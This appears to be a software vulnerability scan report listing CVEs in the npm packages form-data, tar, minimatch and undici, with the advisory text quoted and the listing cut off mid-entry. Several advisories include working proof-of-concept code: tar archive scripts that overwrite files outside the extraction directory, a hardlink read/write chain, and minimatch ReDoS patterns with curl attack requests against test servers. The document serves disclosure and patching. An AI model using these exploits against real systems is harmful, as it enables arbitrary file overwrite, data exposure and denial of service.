Video POC : https://drive.google.com/file/d/1bbuQnoJv_xjM_uvfjnstmTh07FB7VqGH/view?usp=sharing


critical: 1 high: 0 medium: 0 low: 0 form-data 4.0.2 (npm)

pkg:npm/form-data@4.0.2

critical 9.4: CVE--2025--7783 Use of Insufficiently Random Values

Affected range>=4.0.0
<4.0.4
Fixed version4.0.4
CVSS Score9.4
CVSS VectorCVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
EPSS Score0.177%
EPSS Percentile39th percentile
Description

Summary

form-data uses Math.random() to select a boundary value for multipart form-encoded data. This can lead to a security issue if an attacker:

  1. can observe other values produced by Math.random in the target application, and
  2. can control one field of a request made using form-data

Because the values of Math.random() are pseudo-random and predictable (see: https://blog.securityevaluators.com/hacking-the-javascript-lottery-80cc437e3b7f), an attacker who can observe a few sequential values can determine the state of the PRNG and predict future values, includes those used to generate form-data's boundary value. The allows the attacker to craft a value that contains a boundary value, allowing them to inject additional parameters into the request.

This is largely the same vulnerability as was recently found in undici by parrot409 -- I'm not affiliated with that researcher but want to give credit where credit is due! My PoC is largely based on their work.

Details

The culprit is this line here: https://github.com/form-data/form-data/blob/426ba9ac440f95d1998dac9a5cd8d738043b048f/lib/form_data.js#L347

An attacker who is able to predict the output of Math.random() can predict this boundary value, and craft a payload that contains the boundary value, followed by another, fully attacker-controlled field. This is roughly equivalent to any sort of improper escaping vulnerability, with the caveat that the attacker must find a way to observe other Math.random() values generated by the application to solve for the state of the PRNG. However, Math.random() is used in all sorts of places that might be visible to an attacker (including by form-data itself, if the attacker can arrange for the vulnerable application to make a request to an attacker-controlled server using form-data, such as a user-controlled webhook -- the attacker could observe the boundary values from those requests to observe the Math.random() outputs). A common example would be a x-request-id header added by the server. These sorts of headers are often used for distributed tracing, to correlate errors across the frontend and backend. Math.random() is a fine place to get these sorts of IDs (in fact, opentelemetry uses Math.random for this purpose)

PoC

PoC here: https://github.com/benweissmann/CVE-2025-7783-poc

Instructions are in that repo. It's based on the PoC from https://hackerone.com/reports/2913312 but simplified somewhat; the vulnerable application has a more direct side-channel from which to observe Math.random() values (a separate endpoint that happens to include a randomly-generated request ID).

Impact

For an application to be vulnerable, it must:

  • Use form-data to send data including user-controlled data to some other system. The attacker must be able to do something malicious by adding extra parameters (that were not intended to be user-controlled) to this request. Depending on the target system's handling of repeated parameters, the attacker might be able to overwrite values in addition to appending values (some multipart form handlers deal with repeats by overwriting values instead of representing them as an array)
  • Reveal values of Math.random(). It's easiest if the attacker can observe multiple sequential values, but more complex math could recover the PRNG state to some degree of confidence with non-sequential values.

If an application is vulnerable, this allows an attacker to make arbitrary requests to internal systems.

critical: 0 high: 3 medium: 0 low: 0 tar 7.5.7 (npm)

pkg:npm/tar@7.5.7

high 8.2: CVE--2026--31802 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range<=7.5.10
Fixed version7.5.11
CVSS Score8.2
CVSS VectorCVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:H/SA:N
EPSS Score0.007%
EPSS Percentile1st percentile
Description

Summary

tar (npm) can be tricked into creating a symlink that points outside the extraction directory by using a drive-relative symlink target such as C:../../../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction.

Details

The extraction logic in Unpack[STRIPABSOLUTEPATH] validates .. segments against a resolved path that still uses the original drive-relative value, and only afterwards rewrites the stored linkpath to the stripped value.

What happens with linkpath: "C:../../../target.txt":

  1. stripAbsolutePath() removes C: and rewrites the value to ../../../target.txt.
  2. The escape check resolves using the original pre-stripped value, so it is treated as in-bounds and accepted.
  3. Symlink creation uses the rewritten value (../../../target.txt) from nested path a/b/l.
  4. Writing through the extracted symlink overwrites the outside file (../target.txt).

This is reachable in standard usage (tar.x({ cwd, file })) when extracting attacker-controlled tar archives.

PoC

Tested on Arch Linux with tar@7.5.10.

PoC script (poc.cjs):

const fs = require('fs')
const path = require('path')
const { Header, x } = require('tar')

const cwd = process.cwd()
const target = path.resolve(cwd, '..', 'target.txt')
const tarFile = path.join(cwd, 'poc.tar')

fs.writeFileSync(target, 'ORIGINAL\n')

const b = Buffer.alloc(1536)
new Header({
  path: 'a/b/l',
  type: 'SymbolicLink',
  linkpath: 'C:../../../target.txt',
}).encode(b, 0)
fs.writeFileSync(tarFile, b)

x({ cwd, file: tarFile }).then(() => {
  fs.writeFileSync(path.join(cwd, 'a/b/l'), 'PWNED\n')
  process.stdout.write(fs.readFileSync(target, 'utf8'))
})

Run:

node poc.cjs && readlink a/b/l && ls -l a/b/l ../target.txt

Observed output:

PWNED
../../../target.txt
lrwxrwxrwx - joshuavr  7 Mar 18:37 󰡯 a/b/l -> ../../../target.txt
.rw-r--r-- 6 joshuavr  7 Mar 18:37  ../target.txt

PWNED confirms outside file content overwrite. readlink and ls -l confirm the extracted symlink points outside the extraction directory.

Impact

This is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction.

Realistic scenarios:

  • CLI tools unpacking untrusted tarballs into a working directory
  • build/update pipelines consuming third-party archives
  • services that import user-supplied tar files

high 8.2: CVE--2026--29786 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range<=7.5.9
Fixed version7.5.10
CVSS Score8.2
CVSS VectorCVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:H/VA:L/SC:N/SI:H/SA:L
EPSS Score0.016%
EPSS Percentile3rd percentile
Description

Summary

tar (npm) can be tricked into creating a hardlink that points outside the extraction directory by using a drive-relative link target such as C:../target.txt, which enables file overwrite outside cwd during normal tar.x() extraction.

Details

The extraction logic in Unpack[STRIPABSOLUTEPATH] checks for .. segments before stripping absolute roots.

What happens with linkpath: "C:../target.txt":

  1. Split on / gives ['C:..', 'target.txt'], so parts.includes('..') is false.
  2. stripAbsolutePath() removes C: and rewrites the value to ../target.txt.
  3. Hardlink creation resolves this against extraction cwd and escapes one directory up.
  4. Writing through the extracted hardlink overwrites the outside file.

This is reachable in standard usage (tar.x({ cwd, file })) when extracting attacker-controlled tar archives.

PoC

Tested on Arch Linux with tar@7.5.9.

PoC script (poc.cjs):

const fs = require('fs')
const path = require('path')
const { Header, x } = require('tar')

const cwd = process.cwd()
const target = path.resolve(cwd, '..', 'target.txt')
const tarFile = path.join(process.cwd(), 'poc.tar')

fs.writeFileSync(target, 'ORIGINAL\n')

const b = Buffer.alloc(1536)
new Header({ path: 'l', type: 'Link', linkpath: 'C:../target.txt' }).encode(b, 0)
fs.writeFileSync(tarFile, b)

x({ cwd, file: tarFile }).then(() => {
  fs.writeFileSync(path.join(cwd, 'l'), 'PWNED\n')
  process.stdout.write(fs.readFileSync(target, 'utf8'))
})

Run:

cd test-workspace
node poc.cjs && ls -l ../target.txt

Observed output:

PWNED
-rw-r--r-- 2 joshuavr joshuavr 6 Mar  4 19:25 ../target.txt

PWNED confirms outside file content overwrite. Link count 2 confirms the extracted file and ../target.txt are hardlinked.

Impact

This is an arbitrary file overwrite primitive outside the intended extraction root, with the permissions of the process performing extraction.

Realistic scenarios:

  • CLI tools unpacking untrusted tarballs into a working directory
  • build/update pipelines consuming third-party archives
  • services that import user-supplied tar files

high 7.1: CVE--2026--26960 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected range<7.5.8
Fixed version7.5.8
CVSS Score7.1
CVSS VectorCVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N
EPSS Score0.012%
EPSS Percentile2nd percentile
Description

Summary

tar.extract() in Node tar allows an attacker-controlled archive to create a hardlink inside the extraction directory that points to a file outside the extraction root, using default options.

This enables arbitrary file read and write as the extracting user (no root, no chmod, no preservePaths).

Severity is high because the primitive bypasses path protections and turns archive extraction into a direct filesystem access primitive.

Details

The bypass chain uses two symlinks plus one hardlink:

  1. a/b/c/up -> ../..
  2. a/b/escape -> c/up/../..
  3. exfil (hardlink) -> a/b/escape/<target-relative-to-parent-of-extract>

Why this works:

  • Linkpath checks are string-based and do not resolve symlinks on disk for hardlink target safety.

    • See STRIPABSOLUTEPATH logic in:
      • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:255
      • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:268
      • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:281
  • Hardlink extraction resolves target as path.resolve(cwd, entry.linkpath) and then calls fs.link(target, destination).

    • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:566
    • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:567
    • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:703
  • Parent directory safety checks (mkdir + symlink detection) are applied to the destination path of the extracted entry, not to the resolved hardlink target path.

    • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:617
    • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/unpack.js:619
    • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/mkdir.js:27
    • ../tar-audit-setuid - CVE/node_modules/tar/dist/commonjs/mkdir.js:101

As a result, exfil is created inside extraction root but linked to an external file. The PoC confirms shared inode and successful read+write via exfil.

PoC

hardlink.js
Environment used for validation:

  • Node: v25.4.0
  • tar: 7.5.7
  • OS: macOS Darwin 25.2.0
  • Extract options: defaults (tar.extract({ file, cwd }))

Steps:

  1. Prepare/locate a tar module. If require('tar') is not available locally, set TAR_MODULE to an absolute path to a tar package directory.

  2. Run:

TAR_MODULE="$(cd '../tar-audit-setuid - CVE/node_modules/tar' && pwd)" node hardlink.js
  1. Expected vulnerable output (key lines):
same_inode=true
read_ok=true
write_ok=true
result=VULNERABLE

Interpretation:

  • same_inode=true: extracted exfil and external secret are the same file object.
  • read_ok=true: reading exfil leaks external content.
  • write_ok=true: writing exfil modifies external file.

Impact

Vulnerability type:

  • Arbitrary file read/write via archive extraction path confusion and link resolution.

Who is impacted:

  • Any application/service that extracts attacker-controlled tar archives with Node tar defaults.
  • Impact scope is the privileges of the extracting process user.

Potential outcomes:

  • Read sensitive files reachable by the process user.
  • Overwrite writable files outside extraction root.
  • Escalate impact depending on deployment context (keys, configs, scripts, app data).
critical: 0 high: 3 medium: 0 low: 0 minimatch 3.1.2 (npm)

pkg:npm/minimatch@3.1.2

high 8.7: CVE--2026--26996 Inefficient Regular Expression Complexity

Affected range<3.1.3
Fixed version10.2.1
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score0.052%
EPSS Percentile16th percentile
Description

Summary

minimatch is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.

The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

PoC

When minimatch compiles a glob pattern, each * becomes [^/]*? in the generated regex. For a pattern like ***************X***:

/^(?!\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/

When the test string doesn't contain X, the regex engine must try every possible way to distribute the characters across all the [^/]*? groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) — exponential.

Impact

Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This includes:

  • File search/filter UIs that accept glob patterns
  • .gitignore-style filtering with user-defined rules
  • Build tools that accept glob configuration
  • Any API that exposes glob matching to untrusted input

Thanks to @ljharb for back-porting the fix to legacy versions of minimatch.

high 7.5: CVE--2026--27904 Inefficient Regular Expression Complexity

Affected range<3.1.4
Fixed version3.1.4
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.052%
EPSS Percentile16th percentile
Description

Summary

Nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally.


Details

The root cause is in AST.toRegExpSource() at src/ast.ts#L598. For the * extglob type, the close token emitted is )* or )?, wrapping the recursive body in (?:...)*. When extglobs are nested, each level adds another * quantifier around the previous group:

: this.type === '*' && bodyDotAllowed ? `)?`
: `)${this.type}`

This produces the following regexps:

Pattern Generated regex
*(a|b) /^(?:a|b)*$/
*(*(a|b)) /^(?:(?:a|b)*)*$/
*(*(*(a|b))) /^(?:(?:(?:a|b)*)*)*$/
*(*(*(*(a|b)))) /^(?:(?:(?:(?:a|b)*)*)*)*$/

These are textbook nested-quantifier patterns. Against an input of repeated a characters followed by a non-matching character z, V8's backtracking engine explores an exponential number of paths before returning false.

The generated regex is stored on this.set and evaluated inside matchOne() at src/index.ts#L1010 via p.test(f). It is reached through the standard minimatch() call with no configuration.

Measured times via minimatch():

Pattern Input Time
*(*(a|b)) a x30 + z ~68,000ms
*(*(*(a|b))) a x20 + z ~124,000ms
*(*(*(*(a|b)))) a x25 + z ~116,000ms
*(a|a) a x25 + z ~2,000ms

Depth inflection at fixed input a x16 + z:

Depth Pattern Time
1 *(a|b) 0ms
2 *(*(a|b)) 4ms
3 *(*(*(a|b))) 270ms
4 *(*(*(*(a|b)))) 115,000ms

Going from depth 2 to depth 3 with a 20-character input jumps from 66ms to 123,544ms -- a 1,867x increase from a single added nesting level.


PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- verify the generated regexps and timing (standalone script)

Save as poc4-validate.mjs and run with node poc4-validate.mjs:

import { minimatch, Minimatch } from 'minimatch'

function timed(fn) {
  const s = process.hrtime.bigint()
  let result, error
  try { result = fn() } catch(e) { error = e }
  const ms = Number(process.hrtime.bigint() - s) / 1e6
  return { ms, result, error }
}

// Verify generated regexps
for (let depth = 1; depth <= 4; depth++) {
  let pat = 'a|b'
  for (let i = 0; i < depth; i++) pat = `*(${pat})`
  const re = new Minimatch(pat, {}).set?.[0]?.[0]?.toString()
  console.log(`depth=${depth} "${pat}" -> ${re}`)
}
// depth=1 "*(a|b)"          -> /^(?:a|b)*$/
// depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
// depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
// depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/

// Safe-length timing (exponential growth confirmation without multi-minute hang)
const cases = [
  ['*(*(*(a|b)))', 15],   // ~270ms
  ['*(*(*(a|b)))', 17],   // ~800ms
  ['*(*(*(a|b)))', 19],   // ~2400ms
  ['*(*(a|b))',    23],   // ~260ms
  ['*(a|b)',      101],   // <5ms (depth=1 control)
]
for (const [pat, n] of cases) {
  const t = timed(() => minimatch('a'.repeat(n) + 'z', pat))
  console.log(`"${pat}" n=${n}: ${t.ms.toFixed(0)}ms result=${t.result}`)
}

// Confirm noext disables the vulnerability
const t_noext = timed(() => minimatch('a'.repeat(18) + 'z', '*(*(*(a|b)))', { noext: true }))
console.log(`noext=true: ${t_noext.ms.toFixed(0)}ms (should be ~0ms)`)

// +() is equally affected
const t_plus = timed(() => minimatch('a'.repeat(17) + 'z', '+(+(+(a|b)))'))
console.log(`"+(+(+(a|b)))" n=18: ${t_plus.ms.toFixed(0)}ms result=${t_plus.result}`)

Observed output:

depth=1 "*(a|b)"          -> /^(?:a|b)*$/
depth=2 "*(*(a|b))"       -> /^(?:(?:a|b)*)*$/
depth=3 "*(*(*(a|b)))"    -> /^(?:(?:(?:a|b)*)*)*$/
depth=4 "*(*(*(*(a|b))))" -> /^(?:(?:(?:(?:a|b)*)*)*)*$/
"*(*(*(a|b)))" n=15: 269ms result=false
"*(*(*(a|b)))" n=17: 268ms result=false
"*(*(*(a|b)))" n=19: 2408ms result=false
"*(*(a|b))"    n=23: 257ms result=false
"*(a|b)"       n=101: 0ms result=false
noext=true: 0ms (should be ~0ms)
"+(+(+(a|b)))" n=18: 6300ms result=false

Step 2 -- HTTP server (event loop starvation proof)

Save as poc4-server.mjs:

import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3001
http.createServer((req, res) => {
  const url     = new URL(req.url, `http://localhost:${PORT}`)
  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  console.log(`[${new Date().toISOString()}] ${ms.toFixed(0)}ms pattern="${pattern}" path="${path.slice(0,30)}"`)
  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
}).listen(PORT, () => console.log(`listening on ${PORT}`))

Terminal 1 -- start the server:

node poc4-server.mjs

Terminal 2 -- fire the attack (depth=3, 19 a's + z) and return immediately:

curl "http://localhost:3001/match?pattern=*%28*%28*%28a%7Cb%29%29%29&path=aaaaaaaaaaaaaaaaaaaz" &

Terminal 3 -- send a benign request while the attack is in-flight:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3001/match?pattern=*%28a%7Cb%29&path=aaaz"

Observed output -- Terminal 2 (attack):

{"result":false,"ms":"64149"}

Observed output -- Terminal 3 (benign, concurrent):

{"result":false,"ms":"0"}

time_total: 63.022047s

Terminal 1 (server log):

[2026-02-20T09:41:17.624Z] pattern="*(*(*(a|b)))" path="aaaaaaaaaaaaaaaaaaaz"
[2026-02-20T09:42:21.775Z] done in 64149ms result=false
[2026-02-20T09:42:21.779Z] pattern="*(a|b)" path="aaaz"
[2026-02-20T09:42:21.779Z] done in 0ms result=false

The server reports "ms":"0" for the benign request -- the legitimate request itself requires no CPU time. The entire 63-second time_total is time spent waiting for the event loop to be released. The benign request was only dispatched after the attack completed, confirmed by the server log timestamps.

Note: standalone script timing (~7s at n=19) is lower than server timing (64s) because the standalone script had warmed up V8's JIT through earlier sequential calls. A cold server hits the worst case. Both measurements confirm catastrophic backtracking -- the server result is the more realistic figure for production impact.


Impact

Any context where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments, multi-tenant platforms where users configure glob-based rules (file filters, ignore lists, include patterns), and CI/CD pipelines that evaluate user-submitted config files containing glob expressions. No evidence was found of production HTTP servers passing raw user input directly as the extglob pattern, so that framing is not claimed here.

Depth 3 (*(*(*(a|b))), 12 bytes) stalls the Node.js event loop for 7+ seconds with an 18-character input. Depth 2 (*(*(a|b)), 9 bytes) reaches 68 seconds with a 31-character input. Both the pattern and the input fit in a query string or JSON body without triggering the 64 KB length guard.

+() extglobs share the same code path and produce equivalent worst-case behavior (6.3 seconds at depth=3 with an 18-character input, confirmed).

Mitigation available: passing { noext: true } to minimatch() disables extglob processing entirely and reduces the same input to 0ms. Applications that do not need extglob syntax should set this option when handling untrusted patterns.

high 7.5: CVE--2026--27903 Inefficient Algorithmic Complexity

Affected range<3.1.3
Fixed version3.1.3
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.054%
EPSS Percentile16th percentile
Description

Summary

matchOne() performs unbounded recursive backtracking when a glob pattern contains multiple non-adjacent ** (GLOBSTAR) segments and the input path does not match. The time complexity is O(C(n, k)) -- binomial -- where n is the number of path segments and k is the number of globstars. With k=11 and n=30, a call to the default minimatch() API stalls for roughly 5 seconds. With k=13, it exceeds 15 seconds. No memoization or call budget exists to bound this behavior.


Details

The vulnerable loop is in matchOne() at src/index.ts#L960:

while (fr < fl) {
  ..
  if (this.matchOne(file.slice(fr), pattern.slice(pr), partial)) {
    ..
    return true
  }
  ..
  fr++
}

When a GLOBSTAR is encountered, the function tries to match the remaining pattern against every suffix of the remaining file segments. Each ** multiplies the number of recursive calls by the number of remaining segments. With k non-adjacent globstars and n file segments, the total number of calls is C(n, k).

There is no depth counter, visited-state cache, or budget limit applied to this recursion. The call tree is fully explored before returning false on a non-matching input.

Measured timing with n=30 path segments:

k (globstars) Pattern size Time
7 36 bytes ~154ms
9 46 bytes ~1.2s
11 56 bytes ~5.4s
12 61 bytes ~9.7s
13 66 bytes ~15.9s

PoC

Tested on minimatch@10.2.2, Node.js 20.

Step 1 -- inline script

import { minimatch } from 'minimatch'

// k=9 globstars, n=30 path segments
// pattern: 46 bytes, default options
const pattern = '**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/**/a/b'
const path    = 'a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a/a'

const start = Date.now()
minimatch(path, pattern)
console.log(Date.now() - start + 'ms') // ~1200ms

To scale the effect, increase k:

// k=11 -> ~5.4s, k=13 -> ~15.9s
const k = 11
const pattern = Array.from({ length: k }, () => '**/a').join('/') + '/b'
const path    = Array(30).fill('a').join('/')
minimatch(path, pattern)

No special options are required. This reproduces with the default minimatch() call.

Step 2 -- HTTP server (event loop starvation proof)

The following server demonstrates the event loop starvation effect. It is a minimal harness, not a claim that this exact deployment pattern is common:

// poc1-server.mjs
import http from 'node:http'
import { URL } from 'node:url'
import { minimatch } from 'minimatch'

const PORT = 3000

const server = http.createServer((req, res) => {
  const url = new URL(req.url, `http://localhost:${PORT}`)
  if (url.pathname !== '/match') { res.writeHead(404); res.end(); return }

  const pattern = url.searchParams.get('pattern') ?? ''
  const path    = url.searchParams.get('path') ?? ''

  const start  = process.hrtime.bigint()
  const result = minimatch(path, pattern)
  const ms     = Number(process.hrtime.bigint() - start) / 1e6

  res.writeHead(200, { 'Content-Type': 'application/json' })
  res.end(JSON.stringify({ result, ms: ms.toFixed(0) }) + '\n')
})

server.listen(PORT)

Terminal 1 -- start the server:

node poc1-server.mjs

Terminal 2 -- send the attack request (k=11, ~5s stall) and immediately return to shell:

curl "http://localhost:3000/match?pattern=**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2F**%2Fa%2Fb&path=a%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa%2Fa" &

Terminal 3 -- while the attack is in-flight, send a benign request:

curl -w "\ntime_total: %{time_total}s\n" "http://localhost:3000/match?pattern=**%2Fy%2Fz&path=x%2Fy%2Fz"

Observed output (Terminal 3):

{"result":true,"ms":"0"}

time_total: 4.132709s

The server reports "ms":"0" -- the legitimate request itself takes zero processing time. The 4+ second time_total is entirely time spent waiting for the event loop to be released by the attack request. Every concurrent user is blocked for the full duration of each attack call. Repeating the benign request while no attack is in-flight confirms the baseline:

{"result":true,"ms":"0"}

time_total: 0.001599s

Impact

Any application where an attacker can influence the glob pattern passed to minimatch() is vulnerable. The realistic attack surface includes build tools and task runners that accept user-supplied glob arguments (ESLint, Webpack, Rollup config), multi-tenant systems where one tenant configures glob-based rules that run in a shared process, admin or developer interfaces that accept ignore-rule or filter configuration as globs, and CI/CD pipelines that evaluate user-submitted config files containing glob patterns. An attacker who can place a crafted pattern into any of these paths can stall the Node.js event loop for tens of seconds per invocation. The pattern is 56 bytes for a 5-second stall and does not require authentication in contexts where pattern input is part of the feature.

critical: 0 high: 3 medium: 0 low: 0 undici 6.21.2 (npm)

pkg:npm/undici@6.21.2

high 7.5: CVE--2026--2229 Uncaught Exception

Affected range<6.24.0
Fixed version6.24.0
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.108%
EPSS Percentile29th percentile
Description

Impact

The undici WebSocket client is vulnerable to a denial-of-service attack due to improper validation of the server_max_window_bits parameter in the permessage-deflate extension. When a WebSocket client connects to a server, it automatically advertises support for permessage-deflate compression. A malicious server can respond with an out-of-range server_max_window_bits value (outside zlib's valid range of 8-15). When the server subsequently sends a compressed frame, the client attempts to create a zlib InflateRaw instance with the invalid windowBits value, causing a synchronous RangeError exception that is not caught, resulting in immediate process termination.

The vulnerability exists because:

  1. The isValidClientWindowBits() function only validates that the value contains ASCII digits, not that it falls within the valid range 8-15
  2. The createInflateRaw() call is not wrapped in a try-catch block
  3. The resulting exception propagates up through the call stack and crashes the Node.js process

Patches

Has the problem been patched? What versions should users upgrade to?

Workarounds

Is there a way for users to fix or remediate the vulnerability without upgrading?

high 7.5: CVE--2026--1528 Improper Validation of Specified Quantity in Input

Affected range>=6.0.0
<6.24.0
Fixed version6.24.0
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.066%
EPSS Percentile20th percentile
Description

Impact

A server can reply with a WebSocket frame using the 64-bit length form and an extremely large length. undici's ByteParser overflows internal math, ends up in an invalid state, and throws a fatal TypeError that terminates the process.

Patches

Patched in the undici version v7.24.0 and v6.24.0. Users should upgrade to this version or later.

Workarounds

There are no workarounds.

high 7.5: CVE--2026--1526 Improper Handling of Highly Compressed Data (Data Amplification)

Affected range<6.24.0
Fixed version6.24.0
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.067%
EPSS Percentile21st percentile
Description

Description

The undici WebSocket client is vulnerable to a denial-of-service attack via unbounded memory consumption during permessage-deflate decompression. When a WebSocket connection negotiates the permessage-deflate extension, the client decompresses incoming compressed frames without enforcing any limit on the decompressed data size. A malicious WebSocket server can send a small compressed frame (a "decompression bomb") that expands to an extremely large size in memory, causing the Node.js process to exhaust available memory and crash or become unresponsive.

The vulnerability exists in the PerMessageDeflate.decompress() method, which accumulates all decompressed chunks in memory and concatenates them into a single Buffer without checking whether the total size exceeds a safe threshold.

Impact

  • Remote denial of service against any Node.js application using undici's WebSocket client
  • A single compressed WebSocket frame of ~6 MB can decompress to ~1 GB or more
  • Memory exhaustion occurs in native/external memory, bypassing V8 heap limits
  • No application-level mitigation is possible as decompression occurs before message delivery

Patches

Users should upgrade to fixed versions.

Workarounds

No workaround are possible.

critical: 0 high: 3 medium: 0 low: 0 minimatch 10.1.2 (npm)

pkg:npm/minimatch@10.1.2

high 8.7: CVE--2026--26996 Inefficient Regular Expression Complexity

Affected range>=10.0.0
<10.2.1
Fixed version10.2.1
CVSS Score8.7
CVSS VectorCVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
EPSS Score0.052%
EPSS Percentile16th percentile
Description

Summary

minimatch is vulnerable to Regular Expression Denial of Service (ReDoS) when a glob pattern contains many consecutive * wildcards followed by a literal character that doesn't appear in the test string. Each * compiles to a separate [^/]*? regex group, and when the match fails, V8's regex engine backtracks exponentially across all possible splits.

The time complexity is O(4^N) where N is the number of * characters. With N=15, a single minimatch() call takes ~2 seconds. With N=34, it hangs effectively forever.

Details

Give all details on the vulnerability. Pointing to the incriminated source code is very helpful for the maintainer.

PoC

When minimatch compiles a glob pattern, each * becomes [^/]*? in the generated regex. For a pattern like ***************X***:

/^(?!\.)[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?[^/]*?X[^/]*?[^/]*?[^/]*?$/

When the test string doesn't contain X, the regex engine must try every possible way to distribute the characters across all the [^/]*? groups before concluding no match exists. With N groups and M characters, this is O(C(N+M, N)) — exponential.

Impact

Any application that passes user-controlled strings to minimatch() as the pattern argument is vulnerable to DoS. This includes:

  • File search/filter UIs that accept glob patterns
  • .gitignore-style filtering with user-defined rules
  • Build tools that accept glob configuration
  • Any API that exposes glob matching to untrusted input

Thanks to @ljharb for back-porting the fix to legacy versions of minimatch.

high 7.5: CVE--2026--27904 Inefficient Regular Expression Complexity

Affected range>=10.0.0
<10.2.3
Fixed version10.2.3
CVSS Score7.5
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score0.052%
EPSS Percentile16th percentile
Description

Summary

Nested *() extglobs produce regexps with nested unbounded quantifiers (e.g. (?:(?:a|b)*)*), which exhibit catastrophic backtracking in V8. With a 12-byte pattern *(*(*(a|b))) and an 18-byte non-matching input, minimatch() stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default minimatch() API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects +() extglobs equally.


Details

The root cause is in AST.toRegExpSource() at src/ast.ts#L598. For the * extglob type, the close token emitted is )* or )?, wrapping the recursive body in (?:...)*. When extglobs are nested, each level adds another * quantifier around the previous group:

: this.type === '*' && bodyDotAllowed ? `)?`
: `)${this.type}`

This produces the following regexps:

Pattern Generated regex
*(a|b) /^(?:a|b)*$/
*(*(a|b)) /^(?:(?:a|b)*)*$/
*(*(*(a|b))) /^(?:(?:(?:a|b)*)*)*$/
*(*(*(*(a|b)))) /^(?:(?:(?:(?:a|b)*)*)*)*$/

